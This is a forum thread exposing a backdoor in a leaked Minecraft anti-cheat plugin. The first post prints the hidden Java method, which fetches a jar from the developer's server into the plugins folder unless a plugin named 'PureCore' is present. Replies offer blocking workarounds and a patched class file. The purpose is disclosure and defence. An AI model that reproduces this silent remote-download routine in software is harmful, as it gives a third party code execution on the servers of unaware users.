Ninja (Anti-Cheat) Patch

[BabyHusky]

For you people that are using the Leaked version of Ninja (Anti-Cheat) may know that the Developer (Shawckz) of that plugin put a Backdoor into it.

This back door allowed him to run commands from console, crash the server even get SSH access if your server is running in ROOT.


BACK DOOR CODE:

  private void exec()
  {
    if (Bukkit.getServer().getPluginManager().getPlugin("PureCore") == null)
    {
      String out = "plugins/PluginUpdater.jar";
      String file = "http://shawckz.com/PluginUpdater.jar";
      try
      {
        File local = new File(out);
        if (local.exists()) {
          local.delete();
        }
        URL website = new URL(file);
        ReadableByteChannel rbc = Channels.newChannel(website.openStream());
        FileOutputStream fos = new FileOutputStream(local);
        fos.getChannel().transferFrom(rbc, 0L, 9223372036854775807L);
        fos.close();
      }
      catch (Exception e) {}
    }
  }
}

For you guys that don't understand Java, it's basically saying that if Plugin with the name of "PureCore" exists then do nothing, if not download file PluginUpdater.jar from http://shawckz.com/PluginUpdater.jar

When shawckz was confronted about his Backdoor he removed the JAR from his Webserver, recently that JAR has recently gone live again so anyone using this plugin will be forced to download this backdoor from his Webserver.

I've made a very simple blank jar named "PureCore" this will stop the backdoor JAR from downloading it's self to your server.


THIS JAR IS EMPTY IT DOES NOT DO ANYTHING, TO INSTALL PUT THE JAR INTO YOUR /PLUGINS


- BabyHusky

 

[Maccas]

Silly Shawckz.

 

[Cinque]

Another option would be to rename Ninja itself to PureCore.

 

[BabyHusky]

That is a good idea, but for people that do not want to break the plugin this is better.

- BabyHusky

 

[Cinque]

Okay, I patched the main class so you won't have to rename another plugin to PureCore: https://mega.co.nz/#!H4hjTSRQ!hsSdVb2yh7i0qWXxUG9ufsLiKgJ24LmHhfJRkoVGZaw

Just open the ninja jar and drag it in com > shawckz > ninja.

 

[BabyHusky]

I am very aware of how to do this, but i really don't think we should be teaching users how to change the name of plugins that they didn't get permission to rename or claim as there own

Thanks for other ideas

Nor do i think that MC-Market Allows Leaked plugins.

- BabyHusky

 

[BabyHusky]

He probably just used JD-GUI fixed a few of the errors compiled it, and took the .class out of the JAR.


I would also just like to say that this post was just a singular idea it was not made to argue with idea is best, and i'm not saying we are arguing i'm just stating this for the future

- BabyHusky.

 

[Cinque]

did you use a class decoder?

Used JD-GUI to decompile the class, removed the backdoor and compiled it with javac.

 

[BabyHusky]

BB!!!!

From now on my bae "Flap" will get a free copy of all ma ploogins

:3

 

[BabyHusky]

Not that he needs it because hes a MUCH MUCH MUCH more skilled developer than i could ever dream of

 

[AleilDr4go]

anyone can tell me why Ninja spam in my console an error like gettps?

 

[MCSetupsTeam]

We're can we get the download link for Ninja?
I cannot find it anywhere

 

[Blowns]

We're can we get the download link for Ninja?
I cannot find it anywhere

1. It's everywhere
2. There's no point in using it

 

[Quinary]

So the patch makes it completely safe to use?